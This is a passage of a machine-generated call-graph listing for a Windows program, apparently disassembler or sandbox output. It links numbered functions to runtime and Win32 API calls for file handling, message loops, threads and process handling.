96386->96391 96389 e6842a 96396 e681ef try_get_first_available_module 96391->96396 96393 e683ee 96410 e627ec 26 API calls ___std_exception_copy 96393->96410 96395 e68343 96395->96389 96403 e70984 96395->96403 96396->96396 96402 e68338 96396->96402 96406 e58e0b 40 API calls 2 library calls 96396->96406 96398 e6838c 96398->96402 96407 e58e0b 40 API calls 2 library calls 96398->96407 96400 e683ab 96400->96402 96408 e58e0b 40 API calls 2 library calls 96400->96408 96402->96395 96409 e5f2d9 20 API calls _abort 96402->96409 96411 e70081 96403->96411 96405 e7099f 96405->96389 96406->96398 96407->96400 96408->96402 96409->96393 96410->96395 96413 e7008d ___scrt_is_nonwritable_in_current_image 96411->96413 96412 e7009b 96469 e5f2d9 20 API calls _abort 96412->96469 96413->96412 96415 e700d4 96413->96415 96422 e7065b 96415->96422 96416 e700a0 96470 e627ec 26 API calls ___std_exception_copy 96416->96470 96421 e700aa __wsopen_s 96421->96405 96472 e7042f 96422->96472 96425 e706a6 96490 e65221 96425->96490 96426 e7068d 96504 e5f2c6 20 API calls _abort 96426->96504 96429 e70692 96505 e5f2d9 20 API calls _abort 96429->96505 96430 e706ab 96431 e706b4 96430->96431 96432 e706cb 96430->96432 96506 e5f2c6 20 API calls _abort 96431->96506 96503 e7039a CreateFileW 96432->96503 96436 e700f8 96471 e70121 LeaveCriticalSection __wsopen_s 96436->96471 96437 e706b9 96507 e5f2d9 20 API calls _abort 96437->96507 96438 e70781 GetFileType 96441 e707d3 96438->96441 96442 e7078c GetLastError 96438->96442 96440 e70756 GetLastError 96509 e5f2a3 20 API calls __dosmaperr 96440->96509 96512 e6516a 21 API calls 2 library calls 96441->96512 96510 e5f2a3 20 API calls __dosmaperr 96442->96510 96443 e70704 96443->96438 96443->96440 96508 e7039a CreateFileW 96443->96508 96447 e7079a CloseHandle 96447->96429 96448 e707c3 96447->96448 96511 e5f2d9 20 API calls _abort 96448->96511 96450 e70749 96450->96438 96450->96440 96452 e707f4 96454 e70840 96452->96454 96513 e705ab 72 API calls 3 library calls 96452->96513 96453 e707c8 96453->96429 96459 e7086d 96454->96459 96514 e7014d 72 API calls 4 library calls 96454->96514 96457 e70866 96458 e7087e 96457->96458 96457->96459 96458->96436 96461 e708fc CloseHandle 96458->96461 96460 e686ae __wsopen_s 29 API calls 96459->96460 96460->96436 96515 e7039a CreateFileW 96461->96515 96463 e70927 96464 e7095d 96463->96464 96465 e70931 GetLastError 96463->96465 96464->96436 96516 e5f2a3 20 API calls __dosmaperr 96465->96516 96467 e7093d 96517 e65333 21 API calls 2 library calls 96467->96517 96469->96416 96470->96421 96471->96421 96473 e7046a 96472->96473 96474 e70450 96472->96474 96518 e703bf 96473->96518 96474->96473 96525 e5f2d9 20 API calls _abort 96474->96525 96477 e7045f 96526 e627ec 26 API calls ___std_exception_copy 96477->96526 96479 e704a2 96480 e704d1 96479->96480 96527 e5f2d9 20 API calls _abort 96479->96527 96488 e70524 96480->96488 96529 e5d70d 26 API calls 2 library calls 96480->96529 96483 e7051f 96485 e7059e 96483->96485 96483->96488 96484 e704c6 96528 e627ec 26 API calls ___std_exception_copy 96484->96528 96530 e627fc 11 API calls _abort 96485->96530 96488->96425 96488->96426 96489 e705aa 96491 e6522d ___scrt_is_nonwritable_in_current_image 96490->96491 96533 e62f5e EnterCriticalSection 96491->96533 96493 e6527b 96534 e6532a 96493->96534 96495 e65234 96495->96493 96496 e65259 96495->96496 96500 e652c7 EnterCriticalSection 96495->96500 96537 e65000 96496->96537 96497 e652a4 __wsopen_s 96497->96430 96500->96493 96501 e652d4 LeaveCriticalSection 96500->96501 96501->96495 96503->96443 96504->96429 96505->96436 96506->96437 96507->96429 96508->96450 96509->96429 96510->96447 96511->96453 96512->96452 96513->96454 96514->96457 96515->96463 96516->96467 96517->96464 96519 e703d7 96518->96519 96520 e703f2 96519->96520 96531 e5f2d9 20 API calls _abort 96519->96531 96520->96479 96522 e70416 96532 e627ec 26 API calls ___std_exception_copy 96522->96532 96524 e70421 96524->96479 96525->96477 96526->96473 96527->96484 96528->96480 96529->96483 96530->96489 96531->96522 96532->96524 96533->96495 96545 e62fa6 LeaveCriticalSection 96534->96545 96536 e65331 96536->96497 96538 e64c7d _abort 20 API calls 96537->96538 96541 e65012 96538->96541 96539 e6501f 96540 e629c8 _free 20 API calls 96539->96540 96542 e65071 96540->96542 96541->96539 96546 e63405 11 API calls 2 library calls 96541->96546 96542->96493 96544 e65147 EnterCriticalSection 96542->96544 96544->96493 96545->96536 96546->96541 96547 e3dee5 96550 e3b710 96547->96550 96551 e3b72b 96550->96551 96552 e800f8 96551->96552 96553 e80146 96551->96553 96575 e3b750 96551->96575 96556 e80102 96552->96556 96559 e8010f 96552->96559 96552->96575 96616 eb58a2 207 API calls 2 library calls 96553->96616 96614 eb5d33 207 API calls 96556->96614 96570 e3ba20 96559->96570 96615 eb61d0 207 API calls 2 library calls 96559->96615 96562 e803d9 96562->96562 96565 e3ba4e 96567 e80322 96619 eb5c0c 82 API calls 96567->96619 96570->96565 96620 ea359c 82 API calls __wsopen_s 96570->96620 96575->96565 96575->96567 96575->96570 96576 e4d336 40 API calls 96575->96576 96577 e3bbe0 40 API calls 96575->96577 96579 e3a8c7 22 API calls 96575->96579 96581 e3ec40 96575->96581 96605 e3a81b 41 API calls 96575->96605 96606 e4d2f0 40 API calls 96575->96606 96607 e4a01b 207 API calls 96575->96607 96608 e50242 5 API calls __Init_thread_wait 96575->96608 96609 e4edcd 22 API calls 96575->96609 96610 e500a3 29 API calls __onexit 96575->96610 96611 e501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96575->96611 96612 e4ee53 82 API calls 96575->96612 96613 e4e5ca 207 API calls 96575->96613 96617 e3aceb 23 API calls messages 96575->96617 96618 e8f6bf 23 API calls 96575->96618 96576->96575 96577->96575 96579->96575 96582 e3ec76 messages 96581->96582 96583 e3fef7 96582->96583 96586 e4fddb 22 API calls 96582->96586 96587 e84600 96582->96587 96588 e84b0b 96582->96588 96592 e50242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96582->96592 96593 e3a8c7 22 API calls 96582->96593 96596 e3fbe3 96582->96596 96597 e3a961 22 API calls 96582->96597 96598 e500a3 29 API calls pre_c_initialization 96582->96598 96601 e84beb 96582->96601 96602 e501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96582->96602 96603 e3ed9d messages 96582->96603 96604 e3f3ae messages 96582->96604 96621 e401e0 207 API calls 2 library calls 96582->96621 96622 e406a0 41 API calls messages 96582->96622 96590 e3a8c7 22 API calls 96583->96590 96583->96603 96586->96582 96594 e3a8c7 22 API calls 96587->96594 96587->96603 96624 ea359c 82 API calls __wsopen_s 96588->96624 96590->96603 96592->96582 96593->96582 96594->96603 96599 e84bdc 96596->96599 96596->96603 96596->96604 96597->96582 96598->96582 96625 ea359c 82 API calls __wsopen_s 96599->96625 96626 ea359c 82 API calls __wsopen_s 96601->96626 96602->96582 96603->96575 96604->96603 96623 ea359c 82 API calls __wsopen_s 96604->96623 96605->96575 96606->96575 96607->96575 96608->96575 96609->96575 96610->96575 96611->96575 96612->96575 96613->96575 96614->96559 96615->96570 96616->96575 96617->96575 96618->96575 96619->96570 96620->96562 96621->96582 96622->96582 96623->96603 96624->96603 96625->96601 96626->96603 96627 e31044 96632 e310f3 96627->96632 96629 e3104a 96668 e500a3 29 API calls __onexit 96629->96668 96631 e31054 96669 e31398 96632->96669 96636 e3116a 96637 e3a961 22 API calls 96636->96637 96638 e31174 96637->96638 96639 e3a961 22 API calls 96638->96639 96640 e3117e 96639->96640 96641 e3a961 22 API calls 96640->96641 96642 e31188 96641->96642 96643 e3a961 22 API calls 96642->96643 96644 e311c6 96643->96644 96645 e3a961 22 API calls 96644->96645 96646 e31292 96645->96646 96679 e3171c 96646->96679 96650 e312c4 96651 e3a961 22 API calls 96650->96651 96652 e312ce 96651->96652 96700 e41940 96652->96700 96654 e312f9 96710 e31aab 96654->96710 96656 e31315 96657 e31325 GetStdHandle 96656->96657 96658 e72485 96657->96658 96659 e3137a 96657->96659 96658->96659 96660 e7248e 96658->96660 96662 e31387 OleInitialize 96659->96662 96661 e4fddb 22 API calls 96660->96661 96663 e72495 96661->96663 96662->96629 96717 ea011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96663->96717 96665 e7249e 96718 ea0944 CreateThread 96665->96718 96667 e724aa CloseHandle 96667->96659 96668->96631 96719 e313f1 96669->96719 96672 e313f1 22 API calls 96673 e313d0 96672->96673 96674 e3a961 22 API calls 96673->96674 96675 e313dc 96674->96675 96676 e36b57 22 API calls 96675->96676 96677 e31129 96676->96677 96678 e31bc3 6 API calls 96677->96678 96678->96636 96680 e3a961 22 API calls 96679->96680 96681 e3172c 96680->96681 96682 e3a961 22 API calls 96681->96682 96683 e31734 96682->96683 96684 e3a961 22 API calls 96683->96684 96685 e3174f 96684->96685 96686 e4fddb 22 API calls 96685->96686 96687 e3129c 96686->96687 96688 e31b4a 96687->96688 96689 e31b58 96688->96689 96690 e3a961 22 API calls 96689->96690 96691 e31b63 96690->96691 96692 e3a961 22 API calls 96691->96692 96693 e31b6e 96692->96693 96694 e3a961 22 API calls 96693->96694 96695 e31b79 96694->96695 96696 e3a961 22 API calls 96695->96696 96697 e31b84 96696->96697 96698 e4fddb 22 API calls 96697->96698 96699 e31b96 RegisterWindowMessageW 96698->96699 96699->96650 96701 e41981 96700->96701 96707 e4195d 96700->96707 96726 e50242 5 API calls __Init_thread_wait 96701->96726 96703 e4198b 96703->96707 96727 e501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96703->96727 96705 e48727 96709 e4196e 96705->96709 96729 e501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96705->96729 96707->96709 96728 e50242 5 API calls __Init_thread_wait 96707->96728 96709->96654 96711 e31abb 96710->96711 96712 e7272d 96710->96712 96714 e4fddb 22 API calls 96711->96714 96730 ea3209 23 API calls 96712->96730 96716 e31ac3 96714->96716 96715 e72738 96716->96656 96717->96665 96718->96667 96731 ea092a 28 API calls 96718->96731 96720 e3a961 22 API calls 96719->96720 96721 e313fc 96720->96721 96722 e3a961 22 API calls 96721->96722 96723 e31404 96722->96723 96724 e3a961 22 API calls 96723->96724 96725 e313c6 96724->96725 96725->96672 96726->96703 96727->96707 96728->96705 96729->96709 96730->96715 96732 e82a00 96747 e3d7b0 messages 96732->96747 96733 e3db11 PeekMessageW 96733->96747 96734 e3d807 GetInputState 96734->96733 96734->96747 96736 e81cbe TranslateAcceleratorW 96736->96747 96737 e3da04 timeGetTime 96737->96747 96738 e3db73 TranslateMessage DispatchMessageW 96739 e3db8f PeekMessageW 96738->96739 96739->96747 96740 e3dbaf Sleep 96755 e3dbc0 96740->96755 96741 e82b74 Sleep 96741->96755 96742 e4e551 timeGetTime 96742->96755 96743 e81dda timeGetTime 96851 e4e300 23 API calls 96743->96851 96746 e82c0b GetExitCodeProcess 96748 e82c21 WaitForSingleObject 96746->96748 96749 e82c37 CloseHandle 96746->96749 96747->96733 96747->96734 96747->96736 96747->96737 96747->96738 96747->96739 96747->96740 96747->96741 96747->96743 96752 e3d9d5 96747->96752 96760 e3ec40 207 API calls 96747->96760 96764 e3dd50 96747->96764 96771 e3dfd0 96747->96771 96794 e41310 96747->96794 96849 e3bf40 207 API calls 2 library calls 96747->96849 96850 e4edf6 IsDialogMessageW GetClassLongW 96747->96850 96852 ea3a2a 23 API calls 96747->96852 96853 ea359c 82 API calls __wsopen_s 96747->96853 96748->96747 96748->96749 96749->96755 96750 e82a31 96750->96752 96751 ec29bf GetForegroundWindow 96751->96755 96754 e82ca9 Sleep 96754->96747 96755->96742 96755->96746 96755->96747 96755->96750 96755->96751 96755->96752 96755->96754 96854 eb5658 23 API calls 96755->96854 96855 e9e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 96755->96855 96856 e9d4dc 47 API calls 96755->96856 96760->96747 96765 e3dd83 96764->96765 96766 e3dd6f 96764->96766 96858 ea359c 82 API calls __wsopen_s 96765->96858 96857 e3d260 207 API calls 2 library calls 96766->96857 96769 e3dd7a 96769->96747 96770 e82f75 96770->96770 96772 e3e010 96771->96772 96785 e3e0dc messages 96772->96785 96861 e50242 5 API calls __Init_thread_wait 96772->96861 96775 e82fca 96777 e3a961 22 API calls 96775->96777 96775->96785 96776 e3a961 22 API calls 96776->96785 96779 e82fe4 96777->96779 96862 e500a3 29 API calls __onexit 96779->96862 96782 e82fee 96863 e501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96782->96863 96784 ea359c 82 API calls 96784->96785 96785->96776 96785->96784 96788 e3a8c7 22 API calls 96785->96788 96789 e3ec40 207 API calls 96785->96789 96790 e404f0 22 API calls 96785->96790 96791 e3e3e1 96785->96791 96859 e3a81b 41 API calls 96785->96859 96860 e4a308 207 API calls 96785->96860 96864 e50242 5 API calls __Init_thread_wait 96785->96864 96865 e500a3 29 API calls __onexit 96785->96865 96866 e501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96785->96866 96867 eb47d4 207 API calls 96785->96867 96868 eb68c1 207 API calls 96785->96868 96788->96785 96789->96785 96790->96785 96791->96747 96795 e41376 96794->96795 96796 e417b0 96794->96796 96798 e41390 96795->96798 96799 e86331 96795->96799 97021 e50242 5 API calls __Init_thread_wait 96796->97021 96803 e41940 9 API calls 96798->96803 96800 e8633d 96799->96800 96980 eb709c 96799->96980 96800->96747 96802 e417ba 96804 e417fb 96802->96804 96807 e39cb3 22 API calls 96802->96807 96805 e413a0 96803->96805 96809 e86346 96804->96809 96811 e4182c 96804->96811 96806 e41940 9 API calls 96805->96806 96808 e413b6 96806->96808 96815 e417d4 96807->96815 96808->96804 96810 e413ec 96808->96810 97026 ea359c 82 API calls __wsopen_s 96809->97026 96810->96809 96834 e41408 __fread_nolock 96810->96834 97023 e3aceb 23 API calls messages 96811->97023 96814 e41839 97024 e4d217 207 API calls 96814->97024 97022 e501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96815->97022 96818 e8636e 97027 ea359c 82 API calls __wsopen_s 96818->97027 96819 e4152f 96821 e4153c 96819->96821 96822 e863d1 96819->96822 96824 e41940 9 API calls 96821->96824 97029 eb5745 54 API calls _wcslen 96822->97029 96825 e41549 96824->96825 96830 e41940 9 API calls 96825->96830 96840 e415c7 messages 96825->96840 96826 e4fddb 22 API calls 96826->96834 96827 e4fe0b 22 API calls 96827->96834 96828 e41872 97025 e4faeb 23 API calls 96828->97025 96829 e4171d 96829->96747 96838 e41563 96830->96838 96833 e3ec40 207 API calls 96833->96834 96834->96814 96834->96818 96834->96819 96834->96826 96834->96827 96834->96833 96835 e863b2 96834->96835 96834->96840 97028 ea359c 82 API calls __wsopen_s 96835->97028 96836 e41940 9 API calls 96836->96840 96838->96840 96842 e3a8c7 22 API calls 96838->96842 96840->96828 96840->96836 96841 e4167b messages 96840->96841 96869 ea744a 96840->96869 96925 ea83da 96840->96925 96928 eaf0ec 96840->96928 96937 e36246 96840->96937 96941 eb958b 96840->96941 96944 ebe204 96840->96944 97030 ea359c 82 API calls __wsopen_s 96840->97030 96841->96829 97020 e4ce17 22 API calls messages 96841->97020 96842->96840 96849->96747 96850->96747 96851->96747 96852->96747 96853->96747 96854->96755 96855->96755 96856->96755 96857->96769 96858->96770 96859->96785 96860->96785 96861->96775 96862->96782 96863->96785 96864->96785 96865->96785 96866->96785 96867->96785 96868->96785 96870 ea7474 96869->96870 96871 ea7469 96869->96871 96873 ea7554 96870->96873 96875 e3a961 22 API calls 96870->96875 97062 e3b567 39 API calls 96871->97062 96874 e4fddb 22 API calls 96873->96874 96914 ea76a4 96873->96914 96876 ea7587 96874->96876 96877 ea7495 96875->96877 96878 e4fe0b 22 API calls 96876->96878 96879 e3a961 22 API calls 96877->96879 96880 ea7598 96878->96880 96882 ea749e 96879->96882 96881 e36246 CloseHandle 96880->96881 96883 ea75a3 96881->96883 96884 e37510 53 API calls 96882->96884 96885 e3a961 22 API calls 96883->96885 96886 ea74aa 96884->96886 96887 ea75ab 96885->96887 97063 e3525f 22 API calls 96886->97063 96889 e36246 CloseHandle 96887->96889 96892 ea75b2 96889->96892 96890 ea74bf 96891 e36350 22 API calls 96890->96891 96893 ea74f2 96891->96893 97031 e37510 96892->97031 96895 ea754a 96893->96895 97064 e9d4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 96893->97064 97066 e3b567 39 API calls 96895->97066 96898 e36246 CloseHandle 96901 ea75c8 96898->96901 96900 ea7502 96900->96895 96902 ea7506 96900->96902 97054 e35745 96901->97054 96903 e39cb3 22 API calls 96902->96903 96905 ea7513 96903->96905 97065 e9d2c1 26 API calls 96905->97065 96908 ea75ea 97067 e353de 27 API calls messages 96908->97067 96909 ea76de GetLastError 96910 ea76f7 96909->96910 97074 e36216 CloseHandle messages 96910->97074 96913 ea75f8 97068 e353c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 96913->97068 96914->96840 96915 ea751c 96915->96895 96917 ea7645 96918 e4fddb 22 API calls 96917->96918 96920 ea7679 96918->96920 96919 ea75ff 96919->96917 97069 e9ccff 96919->97069 96921 e3a961 22 API calls 96920->96921 96923 ea7686 96921->96923 96923->96914 97073 e9417d 22 API calls __fread_nolock 96923->97073 97081 ea98e3 96925->97081 96927 ea83ea 96927->96840 96929 e37510 53 API calls 96928->96929 96930 eaf126 96929->96930 97144 e39e90 96930->97144 96932 eaf136 96933 eaf15b 96932->96933 96934 e3ec40 207 API calls 96932->96934 96936 eaf15f 96933->96936 97172 e39c6e 22 API calls 96933->97172 96934->96933 96936->96840 96938 e36250 96937->96938 96939 e3625f 96937->96939 96938->96840 96939->96938 96940 e36264 CloseHandle 96939->96940 96940->96938 97180 eb7f59 96941->97180 96943 eb959b 96943->96840 96945 e3a961 22 API calls 96944->96945 96946 ebe21b 96945->96946 96947 e37510 53 API calls 96946->96947 96948 ebe22a 96947->96948 96949 e36270 22 API calls 96948->96949 96950 ebe23d 96949->96950 96951 e37510 53 API calls 96950->96951 96952 ebe24a 96951->96952 96953 ebe262 96952->96953 96954 ebe2c7 96952->96954 97292 e3b567 39 API calls 96953->97292 96955 e37510 53 API calls 96954->96955 96957 ebe2cc 96955->96957 96959 ebe2d9 96957->96959 96960 ebe314 96957->96960 96958 ebe267 96958->96959 96962 ebe280 96958->96962 97295 e39c6e 22 API calls 96959->97295 96963 ebe32c 96960->96963 97296 e3b567 39 API calls 96960->97296 97293 e36d25 22 API calls __fread_nolock 96962->97293 96965 ebe345 96963->96965 97297 e3b567 39 API calls 96963->97297 96968 e3a8c7 22 API calls 96965->96968 96970 ebe35f 96968->96970 96969 ebe28d 96971 e36350 22 API calls 96969->96971 97273 e992c8 96970->97273 96973 ebe29b 96971->96973 97294 e36d25 22 API calls __fread_nolock 96973->97294 96975 ebe2b4 96976 e36350 22 API calls 96975->96976 96978 ebe2c2 96976->96978 96977 ebe2e6 96977->96840 97298 e362b5 22 API calls 96978->97298 96981 eb70db 96980->96981 96982 eb70f5 96980->96982 97313 ea359c 82 API calls __wsopen_s 96981->97313 97302 eb5689 96982->97302 96986 e3ec40 206 API calls 96987 eb7164 96986->96987 96988 eb71ff 96987->96988 96991 eb70ed 96987->96991 96993 eb71a6 96987->96993 96989 eb7253 96988->96989 96990 eb7205 96988->96990 96989->96991 96992 e37510 53 API calls 96989->96992 97314 ea1119 22 API calls 96990->97314 96991->96800 96994 eb7265 96992->96994 96998 ea0acc 22 API calls 96993->96998 96996 e3aec9 22 API calls 96994->96996 97000 eb7289 CharUpperBuffW 96996->97000 96997 eb7228 97315 e3a673 22 API calls 96997->97315 96999 eb71de 96998->96999 97002 e41310 206 API calls 96999->97002 97003 eb72a3 97000->97003 97002->96991 97005 eb72aa 97003->97005 97006 eb72f6 97003->97006 97004 eb7230 97316 e3bf40 207 API calls 2 library calls 97004->97316 97309 ea0acc 97005->97309 97007 e37510 53 API calls 97006->97007 97009 eb72fe 97007->97009 97317 e4e300 23 API calls 97009->97317 97013 e41310 206 API calls 97013->96991 97014 eb7308 97014->96991 97015 e37510 53 API calls 97014->97015 97016 eb7323 97015->97016 97318 e3a673 22 API calls 97016->97318 97018 eb7333 97319 e3bf40 207 API calls 2 library calls 97018->97319 97020->96841 97021->96802 97022->96804 97023->96814 97024->96828 97025->96828 97026->96840 97027->96840 97028->96840 97029->96838 97030->96840 97032 e37525 97031->97032 97048 e37522 97031->97048 97033 e3755b 97032->97033 97034 e3752d 97032->97034 97037 e7500f 97033->97037 97038 e3756d 97033->97038 97046 e750f6 97033->97046 97075 e551c6 26 API calls 97034->97075 97042 e75088 97037->97042 97049 e4fe0b 22 API calls 97037->97049 97076 e4fb21 51 API calls 97038->97076 97039 e3753d 97044 e4fddb 22 API calls 97039->97044 97040 e7510e 97040->97040 97077 e4fb21 51 API calls 97042->97077 97045 e37547 97044->97045 97047 e39cb3 22 API calls 97045->97047 97078 e55183 26 API calls 97046->97078 97047->97048 97048->96898 97050 e75058 97049->97050 97051 e4fddb 22 API calls 97050->97051 97052 e7507f 97051->97052 97053 e39cb3 22 API calls 97052->97053 97053->97042 97055 e74035 97054->97055 97056 e3575c CreateFileW 97054->97056 97057 e7403b CreateFileW 97055->97057 97059 e3577b 97055->97059 97056->97059 97058 e74063 97057->97058 97057->97059 97079 e354c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97058->97079 97059->96908 97059->96909 97061 e7406e 97061->97059 97062->96870 97063->96890 97064->96900 97065->96915 97066->96873 97067->96913 97068->96919 97070 e9cd19 WriteFile 97069->97070 97071 e9cd0e 97069->97071 97070->96917 97080 e9cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97071->97080 97073->96914 97074->96914 97075->97039 97076->97039 97077->97046 97078->97040 97079->97061 97080->97070 97082 ea99e8 97081->97082 97083 ea9902 97081->97083 97139 ea9caa 39 API calls 97082->97139 97085 e4fddb 22 API calls 97083->97085 97086 ea9909 97085->97086 97087 e4fe0b 22 API calls 97086->97087 97088 ea991a 97087->97088 97089 e36246 CloseHandle 97088->97089 97092 ea9925 97089->97092 97090 ea99a2 97091 ea9ac5 97090->97091 97093 ea99ca 97090->97093 97098 ea9a33 97090->97098 97132 ea1e96 97091->97132 97095 e3a961 22 API calls 97092->97095 97093->96927 97097 ea992d 97095->97097 97096 ea9acc 97102 e9ccff 4 API calls 97096->97102 97099 e36246 CloseHandle 97097->97099 97100 e37510 53 API calls 97098->97100 97101 ea9934 97099->97101 97108 ea9a3a 97100->97108 97103 e37510 53 API calls 97101->97103 97126 ea9aa8 97102->97126 97107 ea9940 97103->97107 97104 ea9abb 97141 e9cd57 30 API calls 97104->97141 97105 ea9a6e 97109 e36270 22 API calls 97105->97109 97110 e36246 CloseHandle 97107->97110 97108->97104 97108->97105 97112 ea9a7e 97109->97112 97113 ea994a 97110->97113 97111 e36246 CloseHandle 97114 ea9b1e 97111->97114 97115 ea9a8e 97112->97115 97118 e3a8c7 22 API calls 97112->97118 97116 e35745 5 API calls 97113->97116 97142 e36216 CloseHandle messages 97114->97142 97120 e333c6 22 API calls 97115->97120 97119 ea9959 97116->97119 97118->97115 97121 ea995d 97119->97121 97122 ea99c2 97119->97122 97123 ea9a9c 97120->97123 97136 e353de 27 API calls messages 97121->97136 97138 e36216 CloseHandle messages 97122->97138 97140 e9cd57 30 API calls 97123->97140 97126->97093 97126->97111 97128 ea996b 97137 e353c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97128->97137 97130 ea9972 97130->97090 97131 e9ccff 4 API calls 97130->97131 97131->97090 97133 ea1e9f 97132->97133 97134 ea1ea4 97132->97134 97143 ea0f67 24 API calls __fread_nolock 97133->97143 97134->97096 97136->97128 97137->97130 97138->97093 97139->97090 97140->97126 97141->97126 97142->97093 97143->97134 97145 e36270 22 API calls 97144->97145 97154 e39eb5 97145->97154 97146 e39fd2 97147 e3a4a1 22 API calls 97146->97147 97148 e39fec 97147->97148 97148->96932 97151 e3a12c __fread_nolock 97152 e7f7c4 97151->97152 97162 e3a405 97151->97162 97178 e996e2 84 API calls __wsopen_s 97152->97178 97153 e7f699 97159 e4fddb 22 API calls 97153->97159 97154->97146 97154->97151 97154->97152 97154->97153 97157 e3a6c3 22 API calls 97154->97157 97154->97162 97167 e3a587 22 API calls 97154->97167 97168 e3aec9 22 API calls 97154->97168 97171 e3a4a1 22 API calls 97154->97171 97173 e34573 41 API calls _wcslen 97154->97173 97175 e348c8 23 API calls 97154->97175 97176 e349bd 22 API calls __fread_nolock 97154->97176 97177 e3a673 22 API calls 97154->97177 97157->97154 97163 e7f754 97159->97163 97160 e7f7d2 97161 e3a4a1 22 API calls 97160->97161 97164 e7f7e8 97161->97164 97162->97148 97179 e996e2 84 API calls __wsopen_s 97162->97179 97165 e4fe0b 22 API calls 97163->97165 97164->97148 97165->97151 97167->97154 97169 e3a0db CharUpperBuffW 97168->97169 97174 e3a673 22 API calls 97169->97174 97171->97154 97172->96936 97173->97154 97174->97154 97175->97154 97176->97154 97177->97154 97178->97160 97179->97148 97181 e37510 53 API calls 97180->97181 97182 eb7f90 97181->97182 97187 eb7fd5 messages 97182->97187 97218 eb8cd3 97182->97218 97184 eb844f 97259 eb8ee4 60 API calls 97184->97259 97187->96943 97188 eb845e 97190 eb846a 97188->97190 97191 eb828f 97188->97191 97189 eb8049 97189->97187 97192 e37510 53 API calls 97189->97192 97206 eb8281 97189->97206 97250 e9417d 22 API calls __fread_nolock 97189->97250 97251 eb851d 42 API calls _strftime 97189->97251 97190->97187 97231 eb7e86 97191->97231 97192->97189 97197 eb82c8 97246 e4fc70 97197->97246 97200 eb82e8 97252 ea359c 82 API calls __wsopen_s 97200->97252 97201 eb8302 97253 e363eb 22 API calls 97201->97253 97204 eb8311 97254 e36a50 22 API calls 97204->97254 97205 eb82f3 GetCurrentProcess TerminateProcess 97205->97201 97206->97184 97206->97191 97208 eb832a 97216 eb8352 97208->97216 97255 e404f0 22 API calls 97208->97255 97210 eb84c5 97210->97187 97212 eb84d9 FreeLibrary 97210->97212 97211 eb8341 97256 eb8b7b 75 API calls 97211->97256 97212->97187 97216->97210 97257 e404f0 22 API calls 97216->97257 97258 e3aceb 23 API calls messages 97216->97258 97260 eb8b7b 75 API calls 97216->97260 97219 e3aec9 22 API calls 97218->97219 97220 eb8cee CharLowerBuffW 97219->97220 97261 e98e54 97220->97261 97224 e3a961 22 API calls 97225 eb8d2a 97224->97225 97268 e36d25 22 API calls __fread_nolock 97225->97268 97227 eb8d3e 97229 e393b2 22 API calls 97227->97229 97228 eb8e5e _wcslen 97228->97189 97230 eb8d48 _wcslen 97229->97230 97230->97228 97269 eb851d 42 API calls _strftime 97230->97269 97232 eb7eec 97231->97232 97233 eb7ea1 97231->97233 97237 eb9096 97232->97237 97234 e4fe0b 22 API calls 97233->97234 97235 eb7ec3 97234->97235 97235->97232 97236 e4fddb 22 API calls 97235->97236 97236->97235 97238 eb92ab messages 97237->97238 97244 eb90ba _strcat _wcslen 97237->97244 97238->97197 97239 e3b567 39 API calls 97239->97244 97240 e3b38f 39 API calls 97240->97244 97241 e3b6b5 39 API calls 97241->97244 97242 e37510 53 API calls 97242->97244 97243 e5ea0c 21 API calls ___std_exception_copy 97243->97244 97244->97238 97244->97239 97244->97240 97244->97241 97244->97242 97244->97243 97272 e9efae 24 API calls _wcslen 97244->97272 97248 e4fc85 97246->97248 97247 e4fd1d VirtualProtect 97249 e4fceb 97247->97249 97248->97247 97248->97249 97249->97200 97249->97201 97250->97189 97251->97189 97252->97205 97253->97204 97254->97208 97255->97211 97256->97216 97257->97216 97258->97216 97259->97188 97260->97216 97262 e98e74 _wcslen 97261->97262 97263 e98f63 97262->97263 97266 e98ea9 97262->97266 97267 e98f68 97262->97267 97263->97224 97263->97230 97266->97263 97270 e4ce60 41 API calls 97266->97270 97267->97263 97271 e4ce60 41 API calls 97267->97271 97268->97227 97269->97228 97270->97266 97271->97267 97272->97244 97274 e3a961 22 API calls 97273->97274 97275 e992de 97274->97275 97276 e36270 22 API calls 97275->97276 97277 e992f2 97276->97277 97278 e98e54 41 API calls 97277->97278 97283 e99314 97277->97283 97280 e9930e 97278->97280 97279 e98e54 41 API calls 97279->97283 97280->97283 97299 e36d25 22 API calls __fread_nolock 97280->97299 97283->97279 97284 e993b3 97283->97284 97285 e36350 22 API calls 97283->97285 97287 e99397 97283->97287 97300 e36d25 22 API calls __fread_nolock 97283->97300 97286 e3a8c7 22 API calls 97284->97286 97288 e993c2 97284->97288 97285->97283 97286->97288 97301 e36d25 22 API calls __fread_nolock 97287->97301 97288->96978 97290 e993a7 97291 e36350 22 API calls 97290->97291 97291->97284 97292->96958 97293->96969 97294->96975 97295->96977 97296->96963 97297->96965 97298->96977 97299->97283 97300->97283 97301->97290 97303 eb56a4 97302->97303 97308 eb56f2 97302->97308 97304 e4fe0b 22 API calls 97303->97304 97305 eb56c6 97304->97305 97306 e4fddb 22 API calls 97305->97306 97305->97308 97320 ea0a59 22 API calls 97305->97320 97306->97305 97308->96986 97310 ea0b13 97309->97310 97311 ea0ada 97309->97311 97310->97013 97311->97310 97312 e4fddb 22 API calls 97311->97312 97312->97310 97313->96991 97314->96997 97315->97004 97316->96991 97317->97014 97318->97018 97319->96991 97320->97305 97321 e83a41 97325 ea10c0 97321->97325 97323 e83a4c 97324 ea10c0 53 API calls 97323->97324 97324->97323 97327 ea10cd 97325->97327 97335 ea10fa 97325->97335 97326 ea10fc 97337 e4fa11 53 API calls 97326->97337 97327->97326 97329 ea1101 97327->97329 97333 ea10f4 97327->97333 